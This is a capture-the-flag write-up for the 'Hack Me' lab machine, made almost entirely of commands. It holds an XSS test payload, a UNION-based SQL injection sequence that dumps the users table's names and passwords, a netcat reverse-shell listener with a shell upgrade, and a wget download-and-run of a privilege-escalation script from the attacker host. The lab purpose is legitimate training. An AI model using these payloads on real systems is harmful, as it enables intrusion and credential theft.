Hack Me CTF Write-Up

Overview

Getting Started

root@kali$ arp-scan -l

Port and Service Enumeration

root@kali$ nmap 192.168.8.129

Web Application Testing

<script>alert("XSS")</script>
' or 1=1 limit 1;#

SQL Injection

' or 1=1 limit 2;#
' or 1=1 UNION SELECT 1;#
' or 1=1 UNION SELECT 1,2;#
' or 1=1 UNION SELECT 1,2,3;#
' or 1=1 UNION SELECT 1,2,3,4;#
# current database user
' or 1=1 UNION SELECT 1,user(),3;#
# database version
' or 1=1 UNION SELECT 1,@@version,3;#
# current database name
' or 1=1 UNION SELECT 1, database(),3;#
# table names
' or 1=1 UNION SELECT 1,group_concat(TABLE_NAME,0x0a),3 from information_schema.tables where table_schema=database();#
# columns in users table
' or 1=1 UNION SELECT 1,group_concat(column_name,0x0a),3 from information_schema.columns where table_name='users';#
or 1=1 UNION SELECT 1,group_concat(name,0x0a,password ),3 from information_schema.tables where table_name='users';#

Hash Cracking

root@kali$ hash-identifier
root@kali$ nc -nlvp 4447
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash
python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

root@kali$ cp unix-privesc-check /var/www/html
root@kali$ service apache2 start
www-data@hackme$ wget http://192.168.8.128/unix-privesc-check
www-data@hackme$ chmod 777 unix-privesc-check
www-data@hackme$ ./unix-privesc-check
www-data@hackme$ cp touchmenot /var/www/html
root@kali$ wget http://192.168.8.129/touchmenot
root@kali$ binwalk touchmenot

Tyler Butler
